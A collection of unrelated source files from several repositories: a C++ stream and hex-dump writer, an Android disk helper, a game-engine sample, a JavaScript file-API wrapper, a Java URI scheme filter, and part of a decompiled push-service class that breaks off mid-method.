* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "stream.h"
#include <cassert>
#include <cctype>
#define DUMP_OCTETS_PER_LINE 16
#define DUMP_OCTETS_PER_GROUP 2
namespace wabt {
// Construct a Stream over |writer|. |log_stream| is optional; when set it
// receives a human-readable trace of every write. Offset starts at 0 and the
// sticky result at Ok.
Stream::Stream(Writer* writer, Stream* log_stream)
    : writer_(writer),
      offset_(0),
      result_(Result::Ok),
      log_stream_(log_stream) {}

// Move the current write offset by |delta| (may be negative).
void Stream::AddOffset(ssize_t delta) {
  offset_ += delta;
}
// Write |size| bytes from |src| at absolute position |at| without moving the
// stream offset. Once a previous write failed, all later writes are no-ops
// (sticky error, checked via WABT_FAILED).
void Stream::WriteDataAt(size_t at,
                         const void* src,
                         size_t size,
                         const char* desc,
                         PrintChars print_chars) {
  if (WABT_FAILED(result_))
    return;
  if (log_stream_) {
    // Mirror the bytes into the log as a hex/ASCII dump labeled by |desc|.
    log_stream_->WriteMemoryDump(src, size, at, nullptr, desc, print_chars);
  }
  result_ = writer_->WriteData(at, src, size);
}

// Write |size| bytes at the current offset, then advance the offset by |size|.
void Stream::WriteData(const void* src,
                       size_t size,
                       const char* desc,
                       PrintChars print_chars) {
  WriteDataAt(offset_, src, size, desc, print_chars);
  offset_ += size;
}
// Copy |size| bytes inside the underlying writer from |src_offset| to
// |dst_offset|. Same sticky-error semantics as WriteDataAt.
void Stream::MoveData(size_t dst_offset, size_t src_offset, size_t size) {
  if (WABT_FAILED(result_))
    return;
  if (log_stream_) {
    // Log the move as half-open byte ranges [from, to).
    log_stream_->Writef(
        "; move data: [%" PRIzx ", %" PRIzx ") -> [%" PRIzx ", %" PRIzx ")\n",
        src_offset, src_offset + size, dst_offset, dst_offset + size);
  }
  result_ = writer_->MoveData(dst_offset, src_offset, size);
}
// printf-style formatted write at the current offset.
void Stream::Writef(const char* format, ...) {
  // Expands the varargs into a stack-allocated buffer + length.
  WABT_SNPRINTF_ALLOCA(buffer, length, format);
  WriteData(buffer, length);
}
// Emit a classic hex dump of [start, start+size): DUMP_OCTETS_PER_LINE bytes
// per line, grouped by DUMP_OCTETS_PER_GROUP, each line prefixed with
// |prefix| (if any) and the offset-adjusted address. When |print_chars| is
// Yes, an ASCII column is appended; |desc| is printed on the last line only.
void Stream::WriteMemoryDump(const void* start,
                             size_t size,
                             size_t offset,
                             const char* prefix,
                             const char* desc,
                             PrintChars print_chars) {
  const uint8_t* p = static_cast<const uint8_t*>(start);
  const uint8_t* end = p + size;
  while (p < end) {
    const uint8_t* line = p;  // remember line start for the ASCII pass
    const uint8_t* line_end = p + DUMP_OCTETS_PER_LINE;
    if (prefix)
      Writef("%s", prefix);
    // Address column: position relative to |start|, shifted by |offset|.
    Writef("%07" PRIzx ": ", reinterpret_cast<intptr_t>(p) -
                                 reinterpret_cast<intptr_t>(start) + offset);
    while (p < line_end) {
      for (int i = 0; i < DUMP_OCTETS_PER_GROUP; ++i, ++p) {
        if (p < end) {
          Writef("%02x", *p);
        } else {
          // Pad past the end so the ASCII column stays aligned.
          WriteChar(' ');
          WriteChar(' ');
        }
      }
      WriteChar(' ');
    }
    if (print_chars == PrintChars::Yes) {
      WriteChar(' ');
      p = line;  // rewind and print the same bytes as ASCII
      for (int i = 0; i < DUMP_OCTETS_PER_LINE && p < end; ++i, ++p)
        WriteChar(isprint(*p) ? *p : '.');
    }
    /* if there are multiple lines, only print the desc on the last one */
    if (p >= end && desc)
      Writef(" ; %s", desc);
    WriteChar('\n');
  }
}
// Stream backed by an in-memory writer.
// NOTE(review): the Stream base is handed &writer_ before writer_ itself is
// constructed; safe as long as the base only stores the pointer — confirm.
MemoryStream::MemoryStream() : Stream(&writer_) {}

// Stream writing to a file opened by name.
FileStream::FileStream(const char* filename)
    : Stream(&writer_), writer_(filename) {}

// Stream writing to an already-open FILE*.
FileStream::FileStream(FILE* file) : Stream(&writer_), writer_(file) {}

// static
// Convenience factory: stream over stdout.
std::unique_ptr<FileStream> FileStream::CreateStdout() {
  return std::unique_ptr<FileStream>(new FileStream(stdout));
}

// static
// Convenience factory: stream over stderr.
std::unique_ptr<FileStream> FileStream::CreateStderr() {
  return std::unique_ptr<FileStream>(new FileStream(stderr));
}
} // namespace wabt
|
chenhongs/personal_maven
|
resource/src/main/java/com/ch/android/resource/model/DiskHelper.java
|
<gh_stars>1-10
package com.ch.android.resource.model;
import android.content.Context;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import com.ch.android.resource.util.LogUtils;
import com.google.gson.Gson;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
public class DiskHelper {
private static final String TAG = "DiskHelper";
private static DiskHelper sDefault;
private Context mContext;
private DiskHelper(Context context) {
mContext = context;
}
public static DiskHelper getDefault(Context context) {
if (sDefault == null) {
synchronized (DiskHelper.class) {
if (sDefault == null) {
sDefault = new DiskHelper(context);
}
}
}
return sDefault;
}
public Bitmap readBitmap(String path) {
File file = new File(path);
if (!file.exists()) {
return null;
}
FileInputStream fos = null;
try {
fos = new FileInputStream(file);
return BitmapFactory.decodeStream(fos);
} catch (FileNotFoundException e) {
e.printStackTrace();
} finally {
if (fos != null) {
try {
fos.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
return null;
}
public void saveBitmap(String path, Bitmap bitmap) {
File file = new File(path);
if (!file.exists()) {
try {
file.createNewFile();
} catch (IOException e) {
LogUtils.e(TAG, "saveBitmap >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
return;
}
}
File tmpFile = new File(file.getParent(), file.getName() + ".tmp");
if (!tmpFile.exists()) {
try {
tmpFile.createNewFile();
} catch (IOException e) {
LogUtils.e(TAG, "saveBitmap >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
return;
}
}
boolean success = true;
BufferedOutputStream bos = null;
try {
bos = new BufferedOutputStream(new FileOutputStream(tmpFile));
bitmap.compress(Bitmap.CompressFormat.PNG, 100, bos);
bos.flush();
} catch (FileNotFoundException e) {
success = false;
e.printStackTrace();
} catch (IOException e) {
success = false;
e.printStackTrace();
} finally {
if (bos != null) {
try {
bos.close();
} catch (IOException e) {
success = false;
e.printStackTrace();
}
}
}
if (success) {
// 临时文件改名字
tmpFile.renameTo(file);
} else {
// 删除文件和临时文件
file.delete();
tmpFile.delete();
}
}
public <T> T readObject(String filePath) {
File file = new File(filePath);
if (!file.exists()) {
return null;
}
ObjectInputStream ois = null;
try {
FileInputStream fis = new FileInputStream(file);
ois = new ObjectInputStream(fis);
return (T) ois.readObject();
} catch (FileNotFoundException e) {
LogUtils.e(TAG, "writeObject >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} catch (IOException e) {
LogUtils.e(TAG, "writeObject >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} catch (ClassNotFoundException e) {
LogUtils.e(TAG, "writeObject >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} finally {
if (ois != null) {
try {
ois.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
return null;
}
public <T extends Serializable> void writeObject(T object, String filePath) {
File file = new File(filePath);
if (!file.exists()) {
try {
file.createNewFile();
} catch (IOException e) {
LogUtils.e(TAG, "writeObject >> createNewFile failed.");
e.printStackTrace();
}
}
ObjectOutputStream oos = null;
try {
FileOutputStream fos = new FileOutputStream(file);
oos = new ObjectOutputStream(fos);
oos.writeObject(object);
} catch (FileNotFoundException e) {
LogUtils.e(TAG, "writeObject >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} catch (IOException e) {
LogUtils.e(TAG, "writeObject >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} finally {
if (oos != null) {
try {
oos.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
public void writeObjectWithGson(Object o, String filePath) {
File file = new File(filePath);
if (!file.exists()) {
try {
file.createNewFile();
} catch (IOException e) {
LogUtils.e(TAG, "writeObjectWithGson >> createNewFile failed.");
e.printStackTrace();
}
}
Gson gson = new Gson();
String str = gson.toJson(o);
FileWriter fw = null;
try {
fw = new FileWriter(file);
fw.write(str);
fw.flush();
} catch (IOException e) {
LogUtils.e(TAG, "writeObjectWithGson >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} finally {
if (fw != null) {
try {
fw.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
public <T> T readObjectWithGson(String filePath, Class<T> classOfT) {
File file = new File(filePath);
if (!file.exists()) {
return null;
}
StringBuffer sb = new StringBuffer();
BufferedReader br = null;
try {
FileReader fr = new FileReader(file);
br = new BufferedReader(fr);
String s = null;
while ((s = br.readLine()) != null) {
sb.append(s).append('\n');
}
} catch (FileNotFoundException e) {
LogUtils.e(TAG, "readObjectWithGson >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} catch (IOException e) {
LogUtils.e(TAG, "readObjectWithGson >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
}
String jsonStr = sb.toString();
Gson gson = new Gson();
return gson.fromJson(jsonStr, classOfT);
}
}
|
MateusMP/BitEngine
|
samples/sample01/src/Game/MyGame.h
|
#pragma once
#include <imgui.h>
#include <BitEngine/Core/VideoSystem.h>
#include <BitEngine/Core/Graphics/Sprite2D.h>
#include <BitEngine/Game/ECS/EntitySystem.h>
#include "Game/Common/MainMemory.h"
#include "Game/Common/GameGlobal.h"
#include "Overworld.h"
// Owns the GUI entity and its 2D camera (fixed 1280x720 view, centered,
// zoom 1), used as the render camera for screen-space UI sprites.
class UserGUI
{
public:
    UserGUI(MyGameEntitySystem* es)
    {
        gui = es->createEntity();
        camera = es->addComponent<BitEngine::Camera2DComponent>(gui);
        camera->setView(1280, 720);
        // Look at the view's center so (0,0) maps to the bottom/top-left
        // corner per the engine's convention — TODO confirm which.
        camera->setLookAt(glm::vec3(1280 / 2, 720 / 2, 0));
        camera->setZoom(1.0f);
    }
    // Accessor for the GUI camera component.
    BitEngine::ComponentRef<BitEngine::Camera2DComponent>& getCamera() {
        return camera;
    }
private:
    BitEngine::EntityHandle gui;
    BitEngine::ComponentRef<BitEngine::Camera2DComponent> camera;
};
// Draw a collapsible ImGui tree for |loader|: one node per resource still
// pending load, each showing how many dependencies its load task waits on.
// (Removed the unused TO_MB local left over from an earlier revision.)
void resourceLoaderMenu(const char* name, BitEngine::ResourceLoader* loader) {
    if (ImGui::TreeNode(name)) {
        ImGui::TextColored(ImVec4(1, 1, 0, 1), "Resources pending load: %lu", loader->getPendingToLoad().size());
        for (auto p : loader->getPendingToLoad()) {
            if (ImGui::TreeNode(p.first->getNameId().c_str())) {
                ImGui::TextColored(ImVec4(1, 1, 0, 1), "Task waiting for %lu dependencies", p.second->getDependencies().size());
                ImGui::TreePop();
            }
        }
        ImGui::TreePop();
    }
}
// Top-level game object: owns the per-frame update/render loop, command
// handling, debug UI and (via GameState in engine-provided memory) all
// gameplay state. Designed to survive hot-reload: state lives in
// mainMemory->memory, not in this object.
class MyGame
{
public:
    // Subscribes to command/window/imgui signals and adopts the GameState
    // placed at the start of the engine-provided memory block.
    MyGame(MainMemory* gameMemory)
        : commandListener(gameMemory->commandSystem->commandSignal, &MyGame::onMessage, this),
        windowClosed(gameMemory->window->windowClosedSignal, &MyGame::onMessage, this),
        imguiRender(*gameMemory->imGuiRender, &MyGame::onMessage, this),
        mainMemory(gameMemory)
    {
        gameState = (GameState*)gameMemory->memory;
        if (gameState->initialized) {
            // Hot-reload path: components must be re-registered after reload.
            gameState->entitySystem->registerComponents();
        } else {
            gameState->clearColor = BitEngine::ColorRGBA(0.3f, 0.3f, 0.3f, 0.f);
        }
    }
    ~MyGame() {
    }
    // Debug overview window: clear color, task manager queue, resource loader.
    void onMessage(const BitEngine::ImGuiRenderEvent& ev)
    {
        static bool active = true;
        ImGui::Begin("Overview", &active, ImGuiWindowFlags_MenuBar);
        ImGui::ColorEdit4("Clear Color", (float*)&gameState->clearColor);
        if (ImGui::CollapsingHeader("Tasks"))
        {
            auto taskManager = mainMemory->taskManager;
            // Display contents in a scrolling region
            ImGui::TextColored(ImVec4(1, 1, 0, 1), "Tasks: %lu", taskManager->getTasks().size());
            ImGui::BeginChild("Scrolling");
            for (const BitEngine::TaskPtr& ptr : taskManager->getTasks()) {
                ImGui::Text("Task, deps: %04lu", ptr->getDependencies().size());
            }
            ImGui::EndChild();
        }
        if (ImGui::CollapsingHeader("Resources"))
        {
            resourceLoaderMenu("Loader", mainMemory->loader);
        }
        ImGui::End();
    }
    // Bind gameplay keys/mouse; RELOAD_SHADERS is a debug-only CTRL+R binding.
    void setupCommands(BitEngine::CommandSystem* cmdSys) {
        cmdSys->registerKeyCommandForAllMods(RIGHT, GAMEPLAY, BE_KEY_RIGHT);
        cmdSys->registerKeyCommandForAllMods(LEFT, GAMEPLAY, BE_KEY_LEFT);
        cmdSys->registerKeyCommandForAllMods(UP, GAMEPLAY, BE_KEY_UP);
        cmdSys->registerKeyCommandForAllMods(DOWN, GAMEPLAY, BE_KEY_DOWN);
        cmdSys->RegisterMouseCommand(CLICK, GAMEPLAY, BE_MOUSE_BUTTON_LEFT, BitEngine::MouseAction::PRESS);
#ifdef _DEBUG
        cmdSys->registerKeyboardCommand(RELOAD_SHADERS, -1, BE_KEY_R, BitEngine::KeyAction::PRESS, BitEngine::KeyMod::CTRL);
#endif
        cmdSys->setCommandState(GAMEPLAY);
    }
    // One-time world setup: memory arenas, entity system, cameras, test
    // entities. Returns false if mandatory test textures fail to resolve.
    bool init()
    {
        BE_PROFILE_FUNCTION();
        using namespace BitEngine;
        // Create memory arenas
        gameState->mainArena.init((u8*)mainMemory->memory + sizeof(GameState), mainMemory->memorySize - sizeof(GameState));
        gameState->permanentArena.init((u8*)gameState->mainArena.alloc(MEGABYTES(8)), MEGABYTES(8));
        gameState->entityArena.init((u8*)gameState->mainArena.alloc(MEGABYTES(64)), MEGABYTES(64));
        gameState->resourceArena.init((u8*)gameState->mainArena.alloc(MEGABYTES(256)), MEGABYTES(256));
        gameState->initialized = true;
        setupCommands(mainMemory->commandSystem);
        MemoryArena& permanentArena = gameState->permanentArena;
        auto loader = mainMemory->loader;
        // NOTE(review): init loads "../data/main.idx" but the RELOAD_SHADERS
        // handler below reloads "data/main.idx" — confirm which path is right.
        loader->loadIndex("../data/main.idx");
        // Init game state stuff
        gameState->entitySystem = permanentArena.push<MyGameEntitySystem>(loader, &gameState->entityArena);
        gameState->entitySystem->init();
        gameState->m_userGUI = permanentArena.push<UserGUI>(gameState->entitySystem);
        gameState->m_world = permanentArena.push<GameWorld>(mainMemory, gameState->entitySystem);
        gameState->m_camera3d = permanentArena.push<PlayerCamera>(gameState->entitySystem);
        gameState->m_world->setActiveCamera(gameState->m_camera3d->getCamera());
        gameState->m_camera3d->setLookAt({ 0,0,0 });
        gameState->m_camera3d->getTransform()->setPosition({ 50,0,300 });
        // Tests
        const RR<Texture> texture = loader->getResource<BitEngine::Texture>("texture.png");
        const RR<Texture> texture2 = loader->getResource<BitEngine::Texture>("sun.png");
        if (!texture.isValid() || !texture2.isValid()) {
            return false;
        }
        LOG(GameLog(), BE_LOG_VERBOSE) << "Texture loaded: " << texture->getTextureID();
        RR<Model> model = loader->getResource<Model>("rocks_model");
        for (int i = 0; i < 4; ++i) {
            auto entity = gameState->entitySystem->createEntity();
            auto transform = gameState->entitySystem->addComponent<Transform3DComponent>(entity);
            gameState->entitySystem->addComponent<RenderableMeshComponent>(entity, model);
            transform->setPosition(-300 + i * 180, -20, -200);
        }
        RR<Sprite> spr1 = loader->getResource<BitEngine::Sprite>("data/sprites/spr_skybox");
        RR<Sprite> spr2 = loader->getResource<BitEngine::Sprite>("data/sprites/spr_skybox_orbit");
        RR<Sprite> spr3 = loader->getResource<BitEngine::Sprite>("data/sprites/spr_skybox_piece");
        //BitEngine::SpriteHandle spr1 = loader->getResource<BitEngine::Sprite>("player", BitEngine::Sprite(texture, 128, 128, 0.5f, 0.5f, glm::vec4(0, 0, 1, 1)));
        //BitEngine::SpriteHandle spr2 = sprMng->createSprite("playerOrbit", BitEngine::Sprite(texture, 640, 64, 0.5f, 0.0f, glm::vec4(0, 0, 1.0f, 1.0f)));
        //BitEngine::SpriteHandle spr3 = sprMng->createSprite(BitEngine::Sprite(texture2, 256, 256, 0.5f, 0.5f, glm::vec4(0, 0, 2.0f, 2.0f), true));
        // CREATE PLAYER
        auto playerEntity = CreatePlayerTemplate(loader, gameState->entitySystem, mainMemory->commandSystem);
        gameState->playerControl = gameState->entitySystem->getComponentRef<PlayerControlComponent>(playerEntity);
        // Sparks
        MyGameEntitySystem* es = gameState->entitySystem;
        for (int i = 0; i < 9; ++i)
        {
            BitEngine::EntityHandle h = gameState->entitySystem->createEntity();
            BitEngine::ComponentRef<BitEngine::Transform2DComponent> transformComp;
            BitEngine::ComponentRef<BitEngine::Sprite2DComponent> spriteComp;
            BitEngine::ComponentRef<BitEngine::SceneTransform2DComponent> sceneComp;
            BitEngine::ComponentRef<BitEngine::GameLogicComponent> logicComp;
            transformComp = es->addComponent<BitEngine::Transform2DComponent>(h);
            spriteComp = es->addComponent<BitEngine::Sprite2DComponent>(h, 6, spr3, nullptr); // es->spr2D.getMaterial(Sprite2DRenderer::EFFECT_SPRITE)
            sceneComp = es->addComponent<BitEngine::SceneTransform2DComponent>(h);
            logicComp = es->addComponent<BitEngine::GameLogicComponent>(h);
            es->addComponent<SpinnerComponent>(h, (rand() % 10) / 100.0f + 0.02f);
            transformComp->setLocalPosition(i * 128 + 125, 500);
            spriteComp->alpha = 1.0;
        }
        gameState->running = true;
        return true;
    }
    // Per-frame tick: lazy init, entity processors, task/loader pump, render.
    // Returns false when the game should shut down.
    bool32 update()
    {
        if (!gameState->initialized) {
            init();
            gameState->initialized = true;
        }
        gameState->entitySystem->destroyPending();
        SpinnerSystem(gameState->entitySystem);
        gameState->entitySystem->t2p.Process();
        gameState->entitySystem->t3p.Process();
        gameState->entitySystem->cam2Dprocessor.Process();
        gameState->entitySystem->cam3Dprocessor.Process();
        PlayerControlSystem(gameState->entitySystem);
        mainMemory->taskManager->update();
        mainMemory->loader->update();
        // Render
        if (gameState->running) {
            render();
        }
        else {
            // Shutting down: explicitly destroy the arena-allocated system.
            gameState->entitySystem->~MyGameEntitySystem();
        }
        return gameState->running;
    }
    // Window close requests end the game on the next update().
    void onMessage(const BitEngine::WindowClosedEvent& msg) {
        gameState->running = false;
    }
    // Translate command events into player movement / debug actions.
    void onMessage(const BitEngine::CommandSystem::MsgCommandInput& msg)
    {
        if (msg.commandID == RELOAD_SHADERS) {
            LOG(BitEngine::EngineLog, BE_LOG_INFO) << "Reloading index";
            gameState->resources->loadIndex("data/main.idx");
        }
        BitEngine::ComponentRef<PlayerControlComponent>& comp = gameState->playerControl;
        switch (msg.commandID)
        {
        case RIGHT:
            comp->movH = msg.intensity;
            if (msg.action.fromButton == BitEngine::KeyAction::RELEASE)
                comp->movH = 0;
            break;
        case LEFT:
            comp->movH = -msg.intensity;
            if (msg.action.fromButton == BitEngine::KeyAction::RELEASE)
                comp->movH = 0;
            break;
        case UP:
            comp->movV = msg.intensity;
            if (msg.action.fromButton == BitEngine::KeyAction::RELEASE)
                comp->movV = 0;
            break;
        case DOWN:
            comp->movV = -msg.intensity;
            if (msg.action.fromButton == BitEngine::KeyAction::RELEASE)
                comp->movV = 0;
            break;
        case CLICK:
            printf("CLICK!!!!\n\n");
            break;
        }
    }
    // Push one frame into the render queue: scene clear, 3D meshes, 2D GUI.
    void render()
    {
        BE_PROFILE_FUNCTION();
        SceneBeginCommand* sceneBegin = mainMemory->renderQueue->pushCommand<SceneBeginCommand>();
        sceneBegin->renderWidth = sceneBegin->renderHeight = 0;
        sceneBegin->color = gameState->clearColor;
        gameState->entitySystem->mesh3dSys.processEntities(gameState->entitySystem, mainMemory->renderQueue, gameState->m_world->getActiveCamera());
        Sprite2DProcessor::Process(gameState->entitySystem, gameState->m_userGUI->getCamera(), mainMemory->renderQueue);
    }
    void onMessage(const BitEngine::WindowResizedEvent& ev)
    {
        //mainMemory->videoSystem setViewPort(0, 0, ev.width, ev.height);
    }
private:
    // Scoped signal subscriptions (auto-unsubscribe on destruction).
    BitEngine::Messenger<BitEngine::CommandSystem::MsgCommandInput>::ScopedSubscription commandListener;
    BitEngine::Messenger<BitEngine::WindowClosedEvent>::ScopedSubscription windowClosed;
    BitEngine::Messenger<BitEngine::ImGuiRenderEvent>::ScopedSubscription imguiRender;
    MainMemory* mainMemory;
    GameState* gameState;  // lives in engine memory, not owned by this object
};
|
Bryant-Wang24/jest
|
src/api/ProjectFile.js
|
<reponame>Bryant-Wang24/jest
import base from './base'
import axios from '@/utils/http'
import _axios from 'axios'
import { download } from '@/utils/common'
/**
 * REST wrappers for the `api/hall/rest/project/file` endpoints.
 * Every method returns the underlying axios promise.
 */
const ProjectFile = {
  // Paged query of project files.
  getProjectFiles: params => {
    return axios.post(`${base.hall}api/hall/rest/project/file/page`, params)
  },
  // Upload a project file.
  uploadFile: params => {
    return axios.post(`${base.hall}api/hall/rest/project/file/upload`, params)
  },
  // Fetch the module/type category configuration.
  // NOTE(review): `params` is passed as the axios config object, not as
  // `{ params }` query parameters — confirm this is intentional.
  getTypeMenus: params => {
    return axios.get(`${base.hall}api/hall/rest/project/file/moduleAndTypeInModuleConfigs`, params)
  },
  // Download the file as a blob and hand it to the shared download helper.
  // Fixed: the promise is now returned so callers can await / handle errors.
  download: id => {
    return _axios
      .get(`${base.hall}api/hall/rest/project/file/download/${id}`, { responseType: 'blob' })
      .then(res => {
        download(res)
      })
  },
  // Update file metadata.
  update: params => {
    return axios.put(`${base.hall}api/hall/rest/project/file/update`, params)
  },
  // Delete a file.
  deleteFile: params => {
    return axios.put(`${base.hall}api/hall/rest/project/file/delete`, params)
  }
}
export default ProjectFile
|
FiV0/BUbiNG
|
src/it/unimi/di/law/warc/filters/SchemeEquals.java
|
<reponame>FiV0/BUbiNG
package it.unimi.di.law.warc.filters;
/*
* Copyright (C) 2004-2017 <NAME>, <NAME>, and <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import java.net.URI;
// RELEASE-STATUS: DIST
/** A filter accepting only URIs whose scheme equals a certain string (typically, <code>http</code>).
*
* <p>Note that {@link #apply(URI)} will throw an {@link IllegalArgumentException}
* if the argument has a {@code null} {@linkplain URI#getScheme() scheme}.
*/
/** A filter accepting only URIs whose scheme equals a fixed string
 * (typically, <code>http</code>).
 *
 * <p>Note that {@link #apply(URI)} throws an {@link IllegalArgumentException}
 * when the argument has a {@code null} {@linkplain URI#getScheme() scheme}.
 */
public class SchemeEquals extends AbstractFilter<URI> {

	/** The scheme accepted by this filter. */
	private final String scheme;

	/** Creates a filter that only accepts URIs with a given scheme.
	 *
	 * @param scheme the accepted scheme.
	 */
	public SchemeEquals(final String scheme) {
		this.scheme = scheme;
	}

	/**
	 * Tells whether a URI carries the accepted scheme.
	 *
	 * @param uri the URI to be filtered
	 * @return <code>true</code> if uri has scheme equals to the inner string
	 */
	@Override
	public boolean apply(final URI uri) {
		final String uriScheme = uri.getScheme();
		if (uriScheme == null) throw new IllegalArgumentException("URI \"" + uri + "\" has no scheme");
		return scheme.equals(uriScheme);
	}

	/**
	 * Factory parsing a filter specification.
	 *
	 * @param spec the scheme allowed
	 * @return A new SchemeEquals accepting only URIs whose scheme equals <code>spec</code>
	 */
	public static SchemeEquals valueOf(String spec) {
		return new SchemeEquals(spec);
	}

	/**
	 * A string representation of this filter.
	 *
	 * @return the scheme allowed by this filter
	 */
	@Override
	public String toString() {
		return toString(scheme);
	}

	/**
	 * Equality: same filter type and same accepted scheme.
	 *
	 * @param x an object to be compared
	 * @return <code>true</code> if <code>x</code> is a <code>SchemeEquals</code> allowing the same scheme
	 */
	@Override
	public boolean equals(Object x) {
		return x instanceof SchemeEquals && scheme.equals(((SchemeEquals)x).scheme);
	}

	@Override
	public int hashCode() {
		return scheme.hashCode() ^ SchemeEquals.class.hashCode();
	}

	@Override
	public Filter<URI> copy() {
		// Immutable, so sharing this instance is a valid copy.
		return this;
	}
}
|
gaoht/house
|
java/classes2/com/xiaomi/push/service/at.java
|
package com.xiaomi.push.service;
import android.content.Context;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import com.google.b.a.c;
import com.xiaomi.channel.commonutils.android.j;
import com.xiaomi.channel.commonutils.logger.b;
import com.xiaomi.channel.commonutils.misc.h.b;
import com.xiaomi.push.protobuf.a.a;
import com.xiaomi.push.protobuf.b.b;
import com.xiaomi.smack.util.e;
import java.io.BufferedOutputStream;
import java.util.ArrayList;
import java.util.List;
public class at
{
private static String a;
private static at e = new at();
private List<a> b = new ArrayList();
private a.a c;
private h.b d;
// Returns the process-wide singleton (decompiled obfuscated code).
public static at a()
{
    return e;
}
// Lazily resolves and caches a device UUID: reads "DeviceUUID" from the
// "XMPushServiceConfig" shared preferences, falling back to j.b() and
// persisting the fallback. Decompiled code: the empty `finally {}` is most
// likely a synchronized block lost by the decompiler — TODO confirm.
public static String e()
{
    try
    {
        if (a == null)
        {
            localObject1 = j.a().getSharedPreferences("XMPushServiceConfig", 0);
            a = ((SharedPreferences)localObject1).getString("DeviceUUID", null);
            if (a == null)
            {
                a = j.b();
                if (a != null) {
                    ((SharedPreferences)localObject1).edit().putString("DeviceUUID", a).commit();
                }
            }
        }
        Object localObject1 = a;
        return (String)localObject1;
    }
    finally {}
}
// Lazily loads the cached config via h() on first access.
private void f()
{
    if (this.c == null) {
        h();
    }
}

// Installs the config-update listener (au) once.
private void g()
{
    if (this.d != null) {
        return;
    }
    this.d = new au(this);
    e.a(this.d);
}
/* Error */
private void h()
{
// Byte code:
// 0: new 102 java/io/BufferedInputStream
// 3: dup
// 4: invokestatic 52 com/xiaomi/channel/commonutils/android/j:a ()Landroid/content/Context;
// 7: ldc 104
// 9: invokevirtual 108 android/content/Context:openFileInput (Ljava/lang/String;)Ljava/io/FileInputStream;
// 12: invokespecial 111 java/io/BufferedInputStream:<init> (Ljava/io/InputStream;)V
// 15: astore_2
// 16: aload_2
// 17: astore_1
// 18: aload_0
// 19: aload_2
// 20: invokestatic 116 com/google/b/a/b:a (Ljava/io/InputStream;)Lcom/google/b/a/b;
// 23: invokestatic 121 com/xiaomi/push/protobuf/a$a:c (Lcom/google/b/a/b;)Lcom/xiaomi/push/protobuf/a$a;
// 26: putfield 37 com/xiaomi/push/service/at:c Lcom/xiaomi/push/protobuf/a$a;
// 29: aload_2
// 30: astore_1
// 31: aload_2
// 32: invokevirtual 124 java/io/BufferedInputStream:close ()V
// 35: aload_2
// 36: invokestatic 128 com/xiaomi/channel/commonutils/file/a:a (Ljava/io/InputStream;)V
// 39: aload_0
// 40: getfield 37 com/xiaomi/push/service/at:c Lcom/xiaomi/push/protobuf/a$a;
// 43: ifnonnull +14 -> 57
// 46: aload_0
// 47: new 118 com/xiaomi/push/protobuf/a$a
// 50: dup
// 51: invokespecial 129 com/xiaomi/push/protobuf/a$a:<init> ()V
// 54: putfield 37 com/xiaomi/push/service/at:c Lcom/xiaomi/push/protobuf/a$a;
// 57: return
// 58: astore_3
// 59: aconst_null
// 60: astore_2
// 61: aload_2
// 62: astore_1
// 63: new 131 java/lang/StringBuilder
// 66: dup
// 67: invokespecial 132 java/lang/StringBuilder:<init> ()V
// 70: ldc -122
// 72: invokevirtual 138 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 75: aload_3
// 76: invokevirtual 141 java/lang/Exception:getMessage ()Ljava/lang/String;
// 79: invokevirtual 138 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 82: invokevirtual 144 java/lang/StringBuilder:toString ()Ljava/lang/String;
// 85: invokestatic 149 com/xiaomi/channel/commonutils/logger/b:a (Ljava/lang/String;)V
// 88: aload_2
// 89: invokestatic 128 com/xiaomi/channel/commonutils/file/a:a (Ljava/io/InputStream;)V
// 92: goto -53 -> 39
// 95: astore_2
// 96: aconst_null
// 97: astore_1
// 98: aload_1
// 99: invokestatic 128 com/xiaomi/channel/commonutils/file/a:a (Ljava/io/InputStream;)V
// 102: aload_2
// 103: athrow
// 104: astore_2
// 105: goto -7 -> 98
// 108: astore_3
// 109: goto -48 -> 61
// Local variable table:
// start length slot name signature
// 0 112 0 this at
// 17 82 1 localBufferedInputStream1 java.io.BufferedInputStream
// 15 74 2 localBufferedInputStream2 java.io.BufferedInputStream
// 95 8 2 localObject1 Object
// 104 1 2 localObject2 Object
// 58 18 3 localException1 Exception
// 108 1 3 localException2 Exception
// Exception table:
// from to target type
// 0 16 58 java/lang/Exception
// 0 16 95 finally
// 18 29 104 finally
// 31 35 104 finally
// 63 88 104 finally
// 18 29 108 java/lang/Exception
// 31 35 108 java/lang/Exception
}
// Serializes the cached config (this.c) to the private file "XMCloudCfg".
// Failures are logged and swallowed (best effort).
private void i()
{
    try
    {
        if (this.c != null)
        {
